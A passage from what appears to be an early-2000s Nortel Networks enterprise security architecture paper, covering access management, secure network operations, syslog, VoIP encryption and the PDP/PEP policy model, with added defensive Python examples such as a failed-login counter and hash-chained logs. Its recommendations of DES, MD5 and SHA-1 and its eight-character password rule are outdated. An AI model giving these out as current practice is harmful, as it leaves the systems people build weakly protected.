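    """What policy says should happen to a flow at time 'at' (HH:MM); unmatched flows are denied."""
    for e in acl:
        if (ip_address(src) in ip_network(e["src"]) and dst == e["dst"]
                and proto == e["proto"] and dport == e["dport"]
                and e["start"] <= at <= e["end"]):
            return e["action"]
    return "deny"


def audit(acl: List[Dict], records: List[Dict]) -> List[Dict]:
    """Close the loop: return audit-trail records whose observed verdict disagrees with policy.
    Each mismatch is either a misconfigured enforcement point or a policy that needs updating."""
    return [r for r in records
            if expected_verdict(acl, r["src"], r["dst"], r["proto"], r["dport"], r["time"]) != r["verdict"]]


# Constructed audit trail as an enforcement point might log it (flow, time, verdict).
AUDIT_TRAIL = [
    {"src": "10.1.0.5", "dst": "10.2.0.10", "proto": "tcp", "dport": 443, "time": "10:15", "verdict": "permit"},
    {"src": "10.1.0.5", "dst": "10.2.0.10", "proto": "tcp", "dport": 443, "time": "23:40", "verdict": "permit"},
    {"src": "10.3.0.9", "dst": "10.2.0.10", "proto": "tcp", "dport": 443, "time": "11:00", "verdict": "deny"},
]

if __name__ == "__main__":
    compiled = compile_policy(BUSINESS_POLICY)
    print("\n".join(render_acl(compiled)))
    for bad in audit(compiled, AUDIT_TRAIL):
        print("policy violation:", bad)
```

The second audit record is the interesting one: a Finance workstation reached payroll at 23:40 and the enforcement point permitted it, although the business rule only allows business hours. That is exactly the kind of finding that should result in either a fix to the enforcement point or a deliberate update to the policy document, which is what makes the loop closed.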

2.4. Uniform access management

Access management refers to authentication and authorization services that control users' access to resources. During
authentication, users identify themselves to the network; during authorization, the network determines users' level of privileges
based on their identity, as defined in policy.

Access management is controlled by multiple methods, such as IP source filtering, proxies, and credential-based methods—
often used in combination, and each with its advantages and limitations. For example, an enterprise may choose to manage
access for workstations using IP source filtering, and may choose to use a credential-based scheme for other users.

Since users could be employees, network technicians, supply chain partners, inter-organization team members, or even
customers, it is important to have robust, centralized access control enforced by the local or remote network device interfacing
to the user.

Several methods can be used to authenticate a user, such as: permanent or one-time passwords, biometric techniques, smart
cards, and certificates. Password-based authentication must use strong passwords that are at least eight characters in length with
at least one alphabetic, one numeric, and one special character.

Where stronger authentication is required, password authentication can be combined with another authentication and
authorization process based on protocols such as RADIUS and LDAP to provide authentication, authorization, and accounting (AAA)
services. Additionally, key management can be based on Internet Key Exchange (IKE), certificate management on Public Key
Infrastructure X.509 (PKIX), Certificate Management Protocol (CMP), Online Certificate Status Protocol (OCSP), and
Simple Certificate Validation Protocol (SCVP).

In defining access privileges on all ports and devices, the concept of “least privilege” should be applied, granting access only as
needed.

“Open” and “extended” enterprises face the greatest challenges when designing access management policy. They require fine-
grained rules that properly interface with identity directories and databases, multiple authentication systems such as RADIUS,
and various hosts, applications, and application servers.

The system should perform session management per user after the user is authenticated—and use flexible configuration and
policy enforcement with fine-grained rules, capable of dealing with specific objects. Unique accounts for each administrator
should be used, with accountability for actions traceable to individuals, to provide for appropriate monitoring, accounting, and
secure audit trails.

For more information about authentication and authorization, see section 2.9, “A closer look at uniform access management.”
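
The requirements in this section (the stated password rule, least privilege, unique accounts per administrator, and an audit trail that traces actions to individuals) fit together as one small access-management component. The block below is an added example, not Nortel code and not a RADIUS or LDAP implementation: it checks passwords against the eight-character, alphabetic/numeric/special rule given above, stores them salted with PBKDF2 (this example's choice), authorizes operations only inside an authenticated session and only from a role's permission set, and records every decision against the named account. The role table and permission names are constructed.

```python
"""Uniform access management in miniature: authentication using the password rule stated
above, authorization by least privilege, and an accounting trail that ties every action to
a named individual. Added example, not Nortel code; the role table, permission names and
PBKDF2 password storage are this example's assumptions."""
import hashlib
import hmac
import os
import re
from typing import Dict, List, Set, Tuple

# Constructed role table: each role is granted only the operations it needs.
ROLES: Dict[str, Set[str]] = {
    "netops": {"router:show", "router:config"},
    "helpdesk": {"router:show"},
}

PBKDF2_ROUNDS = 100_000


def password_meets_policy(pw: str) -> bool:
    """At least eight characters, with one alphabetic, one numeric and one special character."""
    return (len(pw) >= 8
            and re.search(r"[A-Za-z]", pw) is not None
            and re.search(r"[0-9]", pw) is not None
            and re.search(r"[^A-Za-z0-9]", pw) is not None)


def _derive(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


class AccessManager:
    """Authentication (who you are), authorization (what you may do), accounting (what you did)."""

    def __init__(self) -> None:
        self._users: Dict[str, Tuple[bytes, bytes, str]] = {}   # name -> (salt, hash, role)
        self._sessions: Set[str] = set()                          # names with a live authenticated session
        self.audit: List[Tuple[str, str, str]] = []               # (who, event, outcome)

    def add_user(self, name: str, password: str, role: str) -> None:
        """Every operator gets a unique account; shared logins would break accountability."""
        if role not in ROLES:
            raise ValueError("unknown role")
        if not password_meets_policy(password):
            raise ValueError("password does not meet policy")
        salt = os.urandom(16)
        self._users[name] = (salt, _derive(password, salt), role)

    def authenticate(self, name: str, password: str) -> bool:
        entry = self._users.get(name)
        ok = False
        if entry is not None:
            salt, stored, _ = entry
            ok = hmac.compare_digest(_derive(password, salt), stored)   # constant-time compare
        if ok:
            self._sessions.add(name)
        self.audit.append((name, "login", "success" if ok else "failure"))
        return ok

    def authorize(self, name: str, permission: str) -> bool:
        """Grant only what the operator's role includes, and only inside an authenticated session."""
        allowed = name in self._sessions and permission in ROLES[self._users[name][2]]
        self.audit.append((name, permission, "granted" if allowed else "denied"))
        return allowed

    def logout(self, name: str) -> None:
        self._sessions.discard(name)
        self.audit.append((name, "logout", "ok"))


def demo() -> AccessManager:
    """Two operators, one failed login, one over-reach; returns the manager so the trail can be read."""
    am = AccessManager()
    am.add_user("alice", "c0rrect-Horse!", "netops")
    am.add_user("bob", "Helpdesk#2024", "helpdesk")
    am.authenticate("bob", "wrong-guess")
    am.authenticate("bob", "Helpdesk#2024")
    am.authorize("bob", "router:show")
    am.authorize("bob", "router:config")    # outside helpdesk's least-privilege set
    am.authorize("alice", "router:config")  # alice holds the right but never authenticated
    am.logout("bob")
    return am


if __name__ == "__main__":
    for who, event, outcome in demo().audit:
        print(f"{who:6} {event:14} {outcome}")
```

Note that the denied authorization for alice is logged against her account even though she never logged in: the accounting record names the individual whose credentials were claimed, which is the property the section asks for. In a real deployment the user store and the audit list would be a centralized RADIUS or LDAP service and a secured log respectively, rather than in-process structures.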

2.5. Secure network operations

On the one hand, network management is like other data applications, running on servers and workstations, complemented by
application-level security and taking advantage of network-level and network-assisted security. On the other hand, network
operators are specialized users who should be subject to more stringent authentication and authorization procedures.

Because of the greater access authority and functional privilege granted to network management personnel, their access and
activities must be carefully secured to protect network configuration, performance, and survivability. The more open the
enterprise and the more centralized the network management system, the greater the requirement for stringent security for
network management processes.

Secure network management requires a holistic approach, rather than a specific security feature set on a network element.
Our Unified Security Architecture recommendations address nine critical areas:
• Secure activity logs
• Network operator authentication
• Authorization for network operators
• Encryption of network management traffic
• Secure remote access for operators
• Firewalls and VLANs to partition the network
• Intrusion detection
• Hardening operating systems
• Anti-virus protection

Secure activity logs provide a verifiable audit trail of user or administrator activities and events generated by network devices.
Security activity logs must contain sufficient information to establish individual accountability, reconstruct past events, detect
intrusion attempts, and perform after-the-fact analysis of security incidents and long-term trend analysis. Activity log
information helps identify the root cause of a security problem and prevent future incidents. For instance, activity logs can be
used to reconstruct the sequence of events that led up to a problem, such as an intruder gaining unauthorized access to system
resources, or a system malfunction caused by an incorrect configuration or a faulty implementation. Syslog is the most
common mechanism used by equipment vendors; Syslog works with all third-party log analyzer systems. Because the
information contained in activity logs can be used to compromise a network, this log information itself must be secured.
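
Three of the points above, that Syslog is the common transport, that logs must let an analyst detect intrusion attempts, and that the log itself must be protected, are shown together in the added example below. It is not Nortel code and not a Syslog feature: it parses BSD-style syslog records (the lines are constructed, not captured from any device), counts failed password events per source as a simple detection, and builds a hash chain over the records so that any edited or removed entry changes every later digest. The chained SHA-256 scheme is this example's choice for tamper evidence.

```python
"""Secure activity logs in practice: parse syslog lines, flag repeated authentication
failures, and protect the log with a hash chain so that an edited or removed record is
detectable. Added example; the log lines are constructed, and the chained SHA-256
scheme is this example's choice, not a Syslog feature."""
import hashlib
import re
from collections import Counter
from typing import Dict, List, Optional

# Constructed BSD-syslog style records as a firewall or server might emit them.
SAMPLE_LOG = [
    "<86>Jan 12 10:01:02 edge-fw sshd[1223]: Failed password for admin from 192.0.2.44 port 51022 ssh2",
    "<86>Jan 12 10:01:05 edge-fw sshd[1223]: Failed password for admin from 192.0.2.44 port 51023 ssh2",
    "<86>Jan 12 10:01:09 edge-fw sshd[1223]: Failed password for root from 192.0.2.44 port 51024 ssh2",
    "<86>Jan 12 10:02:10 edge-fw sshd[1230]: Accepted password for jsmith from 10.1.0.5 port 40211 ssh2",
    "<85>Jan 12 10:05:41 core-sw1 config[77]: operator jsmith changed vlan 20 description",
]

# <PRI>TIMESTAMP HOST APP[PID]: MESSAGE   (PRI = facility * 8 + severity)
SYSLOG_RE = re.compile(
    r"<(?P<pri>\d+)>(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<app>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)")
FAILED_RE = re.compile(r"Failed password for (?P<user>\S+) from (?P<src>\S+)")


def parse(line: str) -> Optional[Dict[str, str]]:
    """Split a record into its fields; returns None for lines that are not syslog."""
    m = SYSLOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    pri = int(rec.pop("pri"))
    rec["facility"] = str(pri // 8)
    rec["severity"] = str(pri % 8)
    return rec


def failed_logins_by_source(lines: List[str], threshold: int = 3) -> Dict[str, int]:
    """Count failed-password events per source address; report sources at or above threshold."""
    counts: Counter = Counter()
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        m = FAILED_RE.search(rec["msg"])
        if m:
            counts[m.group("src")] += 1
    return {src: n for src, n in counts.items() if n >= threshold}


def chain(lines: List[str]) -> List[str]:
    """Digest each record together with the previous digest. The final digest commits to
    the whole log; storing it off-box lets an auditor verify the copy on the device."""
    prev = "0" * 64
    digests = []
    for line in lines:
        prev = hashlib.sha256((prev + "\n" + line).encode("utf-8")).hexdigest()
        digests.append(prev)
    return digests


def verify_chain(lines: List[str], digests: List[str]) -> bool:
    """True only if every record is unchanged and none were inserted or removed."""
    return chain(lines) == digests


if __name__ == "__main__":
    print("repeated failures:", failed_logins_by_source(SAMPLE_LOG))
    digests = chain(SAMPLE_LOG)
    print("intact:", verify_chain(SAMPLE_LOG, digests))
    print("after deleting a record:", verify_chain(SAMPLE_LOG[:3] + SAMPLE_LOG[4:], digests))
```

The hash chain only detects tampering; it does not prevent it, and an attacker who can rewrite the log can recompute the chain unless the latest digest is kept somewhere they cannot reach. That is the practical reason the text insists the log information itself must be secured: shipping records to a separate, access-controlled collector is what gives the chain its value.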

Network operator authentication based on strong centralized administration and enforcement of passwords ensures that only
authenticated operators gain access to management systems. Centralized administration of passwords enables enforcement of
password strength and removes the need for local storage of passwords on the network elements and EMS (Element
Management Systems). RADIUS is the basic mechanism of choice for automating centralized authentication within Nortel
Networks products.

Authorization for network operators uses authenticated identity to determine the user’s access privileges—what systems they
can access, what functions they can perform. Techniques based on RADIUS servers provide a basic level of access control. An
additional LDAP server can provide more fine-grained access control if necessary.

Encryption of network management traffic protects the confidentiality and integrity of network management data traffic—
especially important with the growing use of in-band network management. Encryption provides a high degree of protection
from internal and external threats, with the exception of the small group of insiders that have legitimate access to encryption
keys.

Encryption between network operations center (NOC) clients and Element Management System (EMS) servers and/or
Network Elements should be provided. This includes SNMP traffic, because there are known vulnerabilities with SNMP v1
and v2, which are intended to be addressed by SNMP v3. Given the widespread deployment of SNMP v1 and v2, IPsec
can be used to secure this traffic.

Depending on traffic type, the security protocols to use for these links are IPsec (IP Security), Secure Shell (SSH), and SSL:

• SSH is an application-level security protocol that can be used in place of IPsec if the traffic consists of Telnet and FTP
only, but it cannot normally be used to protect other traffic types.
• IPsec runs between the network layer (Layer 3) and the transport layer (Layer 4) and is the preferred protocol
to protect any type of data traffic, independent of applications and protocols. External IPsec VPN devices, such as
Nortel Networks Contivity Secure IP Services Gateways, can be used in various parts of the network to secure
management traffic.
• SSL technology, integrated into all standard Web browsers, is the de-facto standard security protocol to protect
HTTP traffic.

Secure remote access for operators: Security must be provided for operators and administrators who manage the network
from a remote location over a public network. Providing a secure virtual private network using IPsec is the mandatory solution,
as this will provide strong encryption and authentication of all remote operators. An IP-VPN product such as Nortel Networks
Contivity Secure IP Services Gateway should be placed at the management system interface and all operators should be
equipped with extranet access clients for their laptop or workstations.

Figure 6. Secure connectivity options for network management traffic [figure: browser, Telnet, and management clients in the
Network Operating Center reach the management systems across an L2 NOC VLAN over SSL, IPsec, or SSH; remote clients
cross the Internet over IPsec; the management systems sit behind VS, IDS, FW, Auth, and AL functions, and management
traffic to the enterprise network devices is carried over IPsec or SSH]

Firewalls and VLANs partition the network to segregate management devices and traffic from other, less confidential systems
such as public Web servers. The firewall controls the type of traffic (defined by protocol, port number, source and destination
address) that can transit the boundary between security domains. Depending on the type of firewall (application versus packet
filtering), firewalls can also filter the application content of the data flow.

Intrusion-detection systems incorporated into management servers defend against network intrusions by warning
administrators of potential security incidents, such as a server compromise or denial-of-service attack.

Hardening operating systems used for network management close potential security gaps in general-purpose operating
systems and embedded real-time operating systems. OS hardening should use the latest procedures and patches from the
OS manufacturer.

Anti-virus protection involves scanning all in-house and third-party software packages with virus-detection tools before
incorporating the software into a product or network. A rigorous, established process ensures—to the extent possible—
that network management software is virus-free.

2.6. Secure multimedia communications

Unified networks can carry voice, data, and video—each with their unique performance requirements and security
considerations. When and where to encrypt this traffic is a major consideration, and is a key element of any enterprise security policy.
This can be done on a per-application basis using SSL, on a client-server basis using SSH (Secure Shell), or for all traffic using
IPsec VPN technology. Generally, all traffic over the Internet and wireless LANs and potentially critical information leaving the
premises should be secured via strong encryption technology.

IP telephony represents a particularly important class of application. As with any applications, a risk assessment of IP telephony
needs to be done to assess its intrinsic value, the implications of loss understood, and a security policy formulated. We can start
this assessment by making some key observations on telephony and data security in general. First of all, telephony is a critical
business function and therefore, like the network itself, the telephony system as a whole must be protected from security
attacks. Secondly, we trust the public voice network and live with the inherent vulnerability of eavesdropping of public cell
phone systems. Third, we trust PBX networks, the critical components of which are locked away in a telecom room. In
addition, IT organizations have spent a lot of effort to minimize toll fraud and misuse of the voice network for personal calls.

On the data side, we also rely on physical security to ensure that only employees have access to the internal network, and we
trust that information sent over LANs, campus nets, and over private WANs running over physical and virtual private lines are
generally secure. Outside of the confines of the enterprise network, most enterprises have established security policies that all
internal data transmissions to employees and remote offices over the Internet need to be encrypted and authenticated.
Likewise, critical customer interactions over the Web are protected via SSL. From a user perspective, keeping it simple has been
the objective.

The Nortel Networks Unified Security Architecture for IP telephony follows the guidelines below:
• Enterprise IP telephony operated within the confines of the enterprise, inter-working with the public network over circuit-
switched connections. End-to-end VoIP connectivity between public phones and phones within the enterprise is not
considered in this version of the document.
• The IP networking infrastructure that supports IP telephony must be secure from a data perspective and engineered to
meet the stringent latency and reliability requirements of telephony.
• IP telephony communications servers are business-critical and must be physically secure and protected from internal and
external attack.
• Secure authentication of VoIP clients must be provided. While data users may expect to log in with multiple userIDs and
passwords, they won’t tolerate that authentication requirement for every phone call. Generally, telephony users have only
been required to authenticate themselves for off-net access using a feature set called Direct Inward System Access (DISA).
• Encryption of voice is only a requirement when traversing a shared media LAN or the Internet.
• Security must be holistic and span the entire telephony environment, including VoIP clients and servers, application
servers (such as for unified messaging and contact centers), and traditional PBXs.

Encryption can be achieved with VPN techniques using IPSec, with Authentication Header (AH) and Encapsulating Security
Payload (ESP), tunneling through the use of Layer 2 Tunneling Protocol (L2TP), key management based on Internet Key
Exchange (IKE), and certificate management based on Public Key Infrastructure X.509 (PKIX), Certificate Management
Protocol (CMP), Online Certificate Status Protocol (OCSP), and Simple Certificate Validation Protocol (SCVP). SSL and
Transport Layer Security (TLS) protect communications at the application layer.

Standards-based encryption and digital signature algorithms such as DES, 3DES, AES, RSA, and DSA should be used; MD5 and
SHA-1 should be used for message integrity, and Diffie-Hellman and RSA for key exchange.

The Wired Equivalent Privacy (WEP) as defined in the 802.11 standard defines a technique to protect over-the-air transmis-
sion between wireless LAN (WLAN) access points and network interface cards (NICs). This protocol has been shown to be
insecure. IEEE 802.11 is working on standardizing encryption improvements for WLANs. Therefore, added measures of
protection such as IPsec must be used to secure WLAN traffic over WEP.
2.7. Network survivability under attack

The typical enterprise network supports mission-critical operations and is essential for conducting business. That means the
network must continue to operate—delivering essential services in a timely manner—while battling security threats, even if
parts of the network are unreachable or disabled due to overt attack.

This kind of survivability starts by logically organizing network services into at least two categories—essential services and non-
essential services—and defining strategies that enable these services to resist, address, and recover from attacks. The most
effective approaches combine multiple resistance, identification, and recovery strategies in an adaptable manner that responds to
changing network conditions. For example, the network can re-route traffic from one server to another if an intrusion or an
attack is detected on the first server. That means an effective survivability plan is holistic; it spans management systems, hosts,
applications, routers, and switches across the network.

Naturally, the first line of resistance to attacks is strong access control through authentication and encryption. Keep intruders
out at the first point of entry, if possible. Message and packet filtering and network and server segmentation provide strong
secondary defenses. Intrusion-detection systems identify attacks in progress. Faithful attention to backup techniques enables
rapid system and network recovery after a successful system breach.

This includes high availability through redundancy of critical security functions, such as through the use of application
switches, which provide redundancy between intrusion-detection servers. Additional techniques include the encryption of all
mission-critical traffic, multi-link trunking (MLT), virtual router redundancy protocol (VRRP), dual/mirroring of disk drives,
backup CPUs, backup power supplies, and hot-swappable components. These mechanisms provide a higher level of confidence
in the survivability of critical applications (such as IP telephony).

2.8. The closed-loop policy management reference model

The Nortel Networks Unified Security Architecture is based on the IETF architectural framework for policy management
(RFC 2753). In this model, policy management is implemented across the network and at all levels (application, network-
assisted, network), and applicable to all types of user and applications.

Figure 7. Policy management within the Unified Security Architecture [figure: the policy management console and the policy
repository connect over LDAP to the policy server, the Policy Decision Point (PDP); the PDP drives the network devices, the
Policy Enforcement Points (PEPs) providing L2, NAT, Auth, AL, FW, and CF functions, using COPS-PR, SNMP, or CLI]

The IETF policy management model uses these key elements and protocols:

Policy Decision Points (PDPs) or policy servers abstract network policies into specific device control messages, which are
then passed to policy enforcement points. These policy servers are often standalone systems running Unix or Windows
NT/2000, controlling switches and routers within an administrative domain; they communicate with these devices using a
control protocol (e.g., COPS, SNMP Set commands, Telnet, or the device’s specific Command Line Interface—CLI).

A Policy Enforcement Point (PEP) is a network or security device that accepts a policy (configuration rules) from the Policy
Decision Point and enforces that policy against network traffic traversing that device. This enforcement leverages network and
network-assisted security mechanisms as appropriate.

Common Open Policy Service (COPS) is a simple query-and-response, stateful, TCP-based protocol that exchanges policy
information between a Policy Decision Point (PDP) and its clients—Policy Enforcement Points (PEPs). It is specified in
RFC 2748. COPS relies on the PEP to establish connections to a primary PDP (and a secondary PDP when the primary
is unreachable) at all times. Alternatively, a COPS proxy device can be used to translate COPS messages originating from a
policy server into SNMP or CLI commands understood by network and security devices.

The COPS protocol supports two different extension models for policy control: a dynamic outsourcing model COPS-RSVP,
specified in RFC 2749, and a configuration or Provisioning model COPS-PR, specified in RFC 3084. Provisioning extensions
to the COPS protocol allow policies to be installed on the PEP “up front” by the PDP, thus allowing the PEP to make policy
decisions for data packets based on this pre-provisioned information. Further communication between the PDP and PEP is
necessary to keep policies provisioned in the data repository (i.e. the directory) in sync with those sent to the PEP.

The Policy Repository stores all policy information in a network directory. It describes network users, applications, computers,
and services (i.e., objects and attributes), and the relationships between these entities. There is tight integration between IP
addresses and end users (via the Dynamic Host Configuration Protocol, DHCP, and the Domain Name System, DNS). This policy
repository is usually implemented on a special-purpose database machine running Unix or Windows NT/2000, accessed by
policy servers via LDAP.

The Policy Repository stores relatively static information about the network (such as device configurations), whereas policy
servers store more dynamic network state information (such as bandwidth allocation or information about established
connections). The policy server retrieves policy information from the directory and deploys it to the appropriate network elements.

There is no established standard to describe the structure of the directory database, i.e., how network objects and their
attributes are defined and represented. A common directory schema is needed if multiple vendor applications are to share the same
directory information; for example, all vendors need a common way to interpret and store configuration information about
routers. The forthcoming Directory-Enabled Networking (DEN) standard, now being developed by the DMTF (Desktop
Management Task Force), addresses this need. DEN includes an information model that provides an abstraction of profiles and
policies, devices, protocols, and services. This provides a unified model for integrating users, applications, and networking
services, and an extensible service-oriented framework.

The Lightweight Directory Access Protocol (LDAP version 3) is specified in RFC 2251. LDAP is a client-server protocol for
accessing a directory service. The LDAP information model is based on the entry, which contains information about some
object (e.g., a person), and is composed of attributes, which have a type and one or more values. Each attribute has a syntax
that determines what kinds of values are allowed in the attribute and how those values behave during directory operations.

The last element is the policy management console—generally running on a personal computer or workstation—that provides
the human interface to the policy management system. A Web browser can be used to provide manager access from virtually
anywhere, with policy object-level security used to limit which policies can be modified by a specific individual. The console
provides a graphical user interface and the tools to define network policies as business rules. It may also give the operator
access to lower-level security configurations in individual switches and routers.

These elements of the IETF policy management reference model interoperate to deliver closed-loop policy management. This
includes configuration of edge devices, enforcement of policies in the network, and verification of network functionality as seen
by the end-user application. Enforcement of policies in the network includes admission controls of applications or users vying
for access to network resources. Sound policy management based on this model simplifies the configuration management
environment inside enterprises and minimizes the chance of human error.
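
The PDP/PEP relationship described in this section, including the provisioning model in which policy is installed on the PEP up front so the PEP can decide locally, and the need for further communication to keep the installed policy in sync with the repository, is modelled in the added example below. It is not Nortel or Optivity code and sends no COPS, SNMP, or CLI messages: a PDP object reads per-role rules from an in-memory stand-in for the LDAP repository, provisions each PEP according to the roles it reports, and later detects and repairs drift when the repository changes. The role names, rule tuples, and repository contents are constructed.

```python
"""PDP/PEP provisioning model: a policy server reads per-role rules from a repository,
pre-provisions each enforcement point according to the roles it reports (the COPS-PR
pattern described above), and re-checks that installed policy still matches the
repository. Added example; the repository contents, role names and rule tuples are
assumptions, and no COPS, SNMP or CLI messages are exchanged."""
from typing import Dict, List, Optional, Tuple

Rule = Tuple[str, str, Optional[int]]   # (action, protocol, destination port or None for any)

# Constructed repository (stands in for the LDAP directory): role -> ordered rules.
REPOSITORY: Dict[str, List[Rule]] = {
    "edge-uplink": [("deny", "icmp", None), ("permit", "tcp", 443)],
    "user-access": [("permit", "tcp", 443), ("permit", "udp", 53)],
}


class PEP:
    """A switch or router: holds installed policy per role and decides locally."""

    def __init__(self, name: str, roles: List[str]) -> None:
        self.name = name
        self.roles = list(roles)
        self.installed: Dict[str, List[Rule]] = {}

    def report_roles(self) -> List[str]:
        """Roles are the PEP's abstraction of its interfaces for policy purposes."""
        return list(self.roles)

    def install(self, role: str, rules: List[Rule]) -> None:
        self.installed[role] = list(rules)

    def decide(self, role: str, proto: str, dport: Optional[int]) -> str:
        """First-match decision from pre-provisioned rules; no round trip to the PDP."""
        for action, r_proto, r_port in self.installed.get(role, []):
            if r_proto == proto and (r_port is None or r_port == dport):
                return action
        return "deny"


class PDP:
    """Policy server: turns repository policy into device-level rules and keeps them current."""

    def __init__(self, repository: Dict[str, List[Rule]]) -> None:
        self.repository = repository
        self.peps: Dict[str, PEP] = {}

    def register(self, pep: PEP) -> None:
        """On connection the PEP reports its roles and is provisioned up front."""
        self.peps[pep.name] = pep
        self.provision(pep)

    def provision(self, pep: PEP) -> None:
        for role in pep.report_roles():
            pep.install(role, self.repository.get(role, []))

    def out_of_sync(self) -> List[Tuple[str, str]]:
        """(pep, role) pairs whose installed rules no longer match the repository."""
        drift = []
        for pep in self.peps.values():
            for role in pep.report_roles():
                if pep.installed.get(role) != self.repository.get(role, []):
                    drift.append((pep.name, role))
        return drift

    def resync(self) -> int:
        """Re-provision every drifted (pep, role); returns how many were refreshed."""
        drift = self.out_of_sync()
        for name, role in drift:
            self.peps[name].install(role, self.repository.get(role, []))
        return len(drift)


if __name__ == "__main__":
    pdp = PDP({role: list(rules) for role, rules in REPOSITORY.items()})
    edge = PEP("edge-rtr1", ["edge-uplink"])
    pdp.register(edge)
    print("tcp/443 at edge:", edge.decide("edge-uplink", "tcp", 443))
    pdp.repository["edge-uplink"].append(("permit", "tcp", 22))   # operator updates policy
    print("drift:", pdp.out_of_sync())
    print("refreshed:", pdp.resync(), "tcp/22 now:", edge.decide("edge-uplink", "tcp", 22))
```

Until resync runs, the PEP keeps enforcing the policy it was given, which is the failure mode the text warns about: a repository change is not a network change until the PDP pushes it, so the PDP (or a periodic audit like out_of_sync) has to compare installed and intended state rather than assume they agree.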

Policy Management through Nortel Networks Optivity Policy Services


Nortel Networks is leading the way in delivering policy-enabled networking to enterprise customers. For example, Nortel
Networks Optivity Policy Services (OPS) is a system-level software application that manages security parameters and traffic
prioritization. Optivity Policy Services enables a proactive approach to bandwidth management, security, and prioritization of
business-critical traffic flows across the enterprise. Rather than applying policies to control traffic on a per-device basis, OPS
takes a centralized systems approach to policy configuration and deployment that ensures consistency across the network while
lowering total cost of ownership.

Based on the IETF policy architecture, Optivity Policy Services supports the major IETF policy management standards,
including COPS-PR, LDAP, Diffserv, and IEEE 802.1p. OPS uses COPS-PR to pre-provision routers and switches with policy
information based on Roles reported in from the PEP. Roles are a logical abstraction of the device’s interfaces for policy
management purposes. With the ability to manage up to 1,000 devices per server and 20,000 devices per system, OPS reliably
delivers QoS and security policies in large networks. Moreover, OPS uses LDAPv3 to support redundant data storage,
preserving valuable policy information.

As the number of denial-of-service attacks on networks increases, a centralized mechanism to limit potentially dangerous traffic
flows is important. OPS makes it easy to set policies for metering traffic. For example, many denial-of-service attacks occur
when too many packets of a certain protocol type (such as ICMP) flood a device. OPS policies can control that flow of traffic.
With its Advanced Security Provisioning capabilities, OPS can protect valuable network and application assets by enabling the
application of consistent, reliable, and robust security policies. OPS complements existing firewall implementations (e.g.
Alteon) and IP-VPN devices (e.g. Contivity) by adding an extra layer of protection to network resources. OPS features enable
the creation of policies to restrict traffic through a particular policy enforcement point or to deny all traffic on a particular
device. OPS enables control of traffic flows through a device by simply creating admission control policies through a central
Java-based management console.

2.9. A closer look at uniform access management


Secure access management is created through a combination of authentication, authorization, and accounting services,
often called “AAA”.
• Authentication, initiated by an authentication client in a PC or gateway device, positively verifies the identity of a user
as a prerequisite to allowing access.
• Authorization determines which system resources are appropriate for that authenticated user to access.
• Accounting capabilities rely on audit logs or records of security-related events for future examination.
This section takes a closer look at authentication and authorization.

Authentication
Authentication systems can be categorized according to the number of identification factors required to ascertain identity.
• Single-factor authentication uses userID/password combinations to prove identity.
• Two-factor authentication requires two components, usually a combination of something the user knows
(such as a password) and something the user possesses (such as a physical token SecureID card).
• Three-factor authentication adds a biometric, a measurement of a human body characteristic.
The more authentication factors used, the more secure the process. However, the more factors you add, the more you add
complexity, cost, and management overhead. Every scenario will offer a different break-even point in the trade-off between
simplicity and security.

Single-factor authentication with userID and password is the most common authentication system today. It’s easy to
administer, familiar to users, and can provide a high level of security if strong password procedures are enforced. Legacy
password systems have had some challenges, however, since multiple strong passwords are very hard for users to remember.
The recommendations in this section will show how this problem can be minimized with a “Single Strong Password” system.

Tokens such as smartcards and SecureID cards are added as a second factor in many authentication systems—requiring that the
user have physical possession of the token. An attacker would similarly have to have possession of the user’s token in order to
gain system access. The higher level of authentication comes with additional system cost, however, due to the necessary tokens
and token readers. In addition, tokens can be easily lost, which can present a high administration overhead for reissuing.

Biometric factors for authentication measure characteristics of the user’s body such as fingerprint, handprint, retina, iris, or
voice characteristics. Biometric measurements are a useful additional factor and add an even higher level of authentication
security. A biometric authentication system entails a measurement proving who the person actually is, rather than proving they
have something such as a token or proving that they know something such as a password. Unfortunately, biometric
measurements are not 100 percent effective; with the present state of the technology, it is possible to register false positives and
false negatives. Biometric authentication systems also require biometric readers at system access points, adding new system costs.

Strong cryptographically-based authentication can be provided through the use of digital certificates issued to users and stored
on tokens or within the user’s computer memory. Cryptographic algorithms are used to ensure that a particular certificate has
been legitimately issued to the user. A Public Key Infrastructure is used to enable the issuance and maintenance of digital
certificates. Strong cryptographically-based systems provide very stringent authentication. However, these systems are expensive
and incur additional management overhead. Therefore, they are currently being adopted only in very secure environments.

Authorization
Once authenticated, authorization mechanisms control user access to appropriate system resources. Authorization can be
categorized according to the granularity of control; that is, according to how detailed a division is made between system
resources. Fine-grained authorization refers generically to a system where access is controlled to very fine increments, such as to
individual applications or services.

Authorization is often “role based” whereby access to system resources is based on a person’s assigned role in an organization.
The System Administrator role may have highly privileged access to all system resources whereas the General User role would
only have access to a subset of these resources. Finer grained authorization can be applied to define other roles, such as a
Human Resources Administrators role that has exclusive access to confidential HR databases, and an Accounting role that has
exclusive access to accounting systems.

Authorization may also be “rules based” whereby access to system resources is based on specific rules associated with each user,
independent of their role in the organization. For example, rules may be set up to allow Read Only access or Read/Write access
to all or certain files within a system, or access only during certain times or from certain devices.

Authentication and authorization protocols


Several protocols have been commonly adopted for authentication services. The RADIUS protocol (Remote Authentication
Dial In User Service – IETF RFC2865) is widely used to centralize password authentication services. Originally designed to
authenticate remote dial-in users, the RADIUS protocol has been adopted for general user authentication services. Recently,
the LDAP (lightweight directory access protocol – IETF RFC2251) has been finding extensive use in authentication and
authorization systems. LDAP provides a convenient method for storing user authentication and authorization credentials.

RADIUS authentication servers are often coupled with credential storage in LDAP directories to provide centralized
authentication and authorization. When a user attempts to access a particular application on such a system, the application
queries the user for authentication credentials and forwards them to the centralized system. The RADIUS server then checks the
presented credentials against those stored in the LDAP database, and also queries the LDAP database for authorization rule
information. The authentication results (pass or fail) are returned to the application along with authorization rule information
for the particular user. Authorization rules are then enforced at the application to allow the user to access particular data or
services. From an end-user perspective, these authentication and authorization systems should be automatic and easy to use.

Authentication and authorization recommendations


Nortel Networks recommends the following general principles to be followed when implementing enterprise authentication
and authorization systems:

• Use a uniform access management system for end users, network operators, partners and customers, with the appropriate
level of authentication and resource access authorization to meet business needs.
• Use a centralized authentication mechanism to facilitate administration and remove the need for locally stored passwords,
